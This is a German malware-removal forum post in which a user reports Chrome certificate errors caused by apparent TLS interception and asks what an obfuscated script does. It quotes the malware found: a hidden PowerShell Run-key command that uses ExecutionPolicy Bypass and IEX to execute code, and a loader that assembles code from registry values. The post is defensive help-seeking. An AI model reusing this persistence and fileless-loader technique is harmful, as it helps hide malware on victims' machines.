Zurück   Trojaner-Board > Malware entfernen > Plagegeister aller Art und deren Bekämpfung

Plagegeister aller Art und deren Bekämpfung: Chrome meldet ungültige Zertifikate

Windows 7 Wenn Du nicht sicher bist, ob Du dir Malware oder Trojaner eingefangen hast, erstelle hier ein Thema. Ein Experte wird sich mit weiteren Anweisungen melden und Dir helfen die Malware zu entfernen oder Unerwünschte Software zu deinstallieren bzw. zu löschen. Bitte schildere dein Problem so genau wie möglich. Sollte es ein Trojaner oder Viren Problem sein wird ein Experte Dir bei der Beseitigug der Infektion helfen.

 
Alt 25.11.2020, 11:10   #1
mahescho
 
Chrome meldet ungültige Zertifikate - Standard

Chrome meldet ungültige Zertifikate



Hallo,

ich habe jetzt noch keine nähren Analysen (FRST) machen können, da mit der PC noch nicht physisch zur Verfügung steht, möchte aber trotzdem schon mal das Problem schildern.

Seit zwei Tagen ist es so, dass Chrom, und nur Crome (Firefox und Brave ist nicht betrofen) bei jeder (!) Webseite meldet, dass das Zertifikat ungültig ist. Schaue ich mir die Zertifikate an, dann ist der Aussteller immer Godady. Vergleiche ich die Zertifikate ist der Rest (bis auf Serial, Key, usw.) identisch. Es liegt also nahe dass für Chrome der Traffic durch einen Proxy geleitet wird der versucht in den SSL-Traffic einzubrechen.

Ich habe im Zertifikatsstore ein Root-Zertifikat für 127.0.0.1 gefunden. Das reiche ich noch nach, habe ich im Moment nicht vorrätig. Das habe ich vorsorglich entfernt. Nach einem Neustart war das Problem dann weg. Am nächsten Tag war das Problem aber wieder da. Dann habe ich mich weiter umgesehen und in der Registry unter "Run" für den Benutzer folgendes gefunden:

Code:
ATTFilter
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -windowstyle hidden -Command "IEX([Environment]::GetEnvironmentVariable('aebadbbdaffbef', 'User'))"
         
Die dort referenzierte Environment-Variable enthält:

Code:
ATTFilter
for ($i=0;$i -le 500;$i++){Try{$abc=$abc+(Get-ItemProperty -path 'HKCU:\SOFTWARE\aebadbbdaffbef').$i}Catch{}}IEX($abc)
         
Die dort referenzieren Registry-Keys habe ich exportiert und hier angehängt.

Das ist offensichtlich obfuskierter Powershell-Code. Lässt sich herausfinden was der tut?

So viel für Heute dazu, später mehr.

TIA
Matthias
Angehängte Dateien
Dateityp: zip reg.zip (343,6 KB, 42x aufgerufen)

 

Themen zu Chrome meldet ungültige Zertifikate
127.0.0.1, analyse, benutzer, code, firefox, folge, folgendes, gültig, herausfinden, heute, ide, iex, melde, meldet, neustart, powershell, problem, proxy, registry, serial, software, traffic, ungültig, versucht, webseite, windows, windows 10




Ähnliche Themen: Chrome meldet ungültige Zertifikate


  1. Chrome soll eigenen Root-Store für Zertifikate bekommen
    Nachrichten - 04.11.2020 (0)
  2. Chrome, Firefox, Safari: Verkürzte Laufzeit für SSL/TLS-Zertifikate
    Nachrichten - 18.08.2020 (0)
  3. Ungültige MS Dos Funktion
    Alles rund um Windows - 15.01.2017 (30)
  4. Win7- Avast meldet mir Chrome als Bedrohung
    Plagegeister aller Art und deren Bekämpfung - 27.01.2016 (12)
  5. Windows 10: Avast meldet unter Google Chrome ständig blockierte Bedrohung
    Log-Analyse und Auswertung - 20.01.2016 (5)
  6. Windows 10: Beim Surfen mit Google Chrome meldet Avast sehr häufig Bedrohung (URL:Mal)
    Log-Analyse und Auswertung - 15.01.2016 (9)
  7. Win 7:Langsam , Chrome mit Werbung überfüllt, Avast meldet ständig
    Log-Analyse und Auswertung - 29.11.2014 (17)
  8. Win7: Chrome läuft nicht mehr - Avira meldet Fehler: TR/Patched.Ren.Gen
    Log-Analyse und Auswertung - 19.11.2014 (29)
  9. Adwcleaner meldet Google Chrome preferences
    Plagegeister aller Art und deren Bekämpfung - 13.08.2014 (3)
  10. Browser öffnet selbstendig Taps mit dem inhalt Fehler: Ungültige Adresse
    Log-Analyse und Auswertung - 10.03.2014 (9)
  11. Webbrowser Chrome 33 meldet Krachmacher und bietet "überwachte Nutzer"
    Nachrichten - 15.01.2014 (0)
  12. Sicherheitscenter wird immer wieder deaktiviert, chrome meldet Profil Fehler
    Log-Analyse und Auswertung - 10.06.2013 (3)
  13. der server lieferte eine ungültige oder unbekannte rückmeldung
    Alles rund um Windows - 11.12.2010 (3)
  14. windows security alert + malware defence + keine exe ausführbar "ungültige win32 anw"
    Plagegeister aller Art und deren Bekämpfung - 03.01.2010 (3)
  15. Fehlermeldung: Explorer ...ungültige Seite in Modul unbekannt
    Log-Analyse und Auswertung - 02.12.2005 (2)
  16. Fehler durch ungültige Seite/sp.html/se.dll?
    Plagegeister aller Art und deren Bekämpfung - 13.05.2005 (9)
  17. Re:ungültige Zeichen in ihrer E-Mail
    Plagegeister aller Art und deren Bekämpfung - 02.01.2005 (9)

Zum Thema Chrome meldet ungültige Zertifikate - Hallo, ich habe jetzt noch keine nähren Analysen (FRST) machen können, da mit der PC noch nicht physisch zur Verfügung steht, möchte aber trotzdem schon mal das Problem schildern. Seit - Chrome meldet ungültige Zertifikate...
Archiv
Du betrachtest: Chrome meldet ungültige Zertifikate auf Trojaner-Board

Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.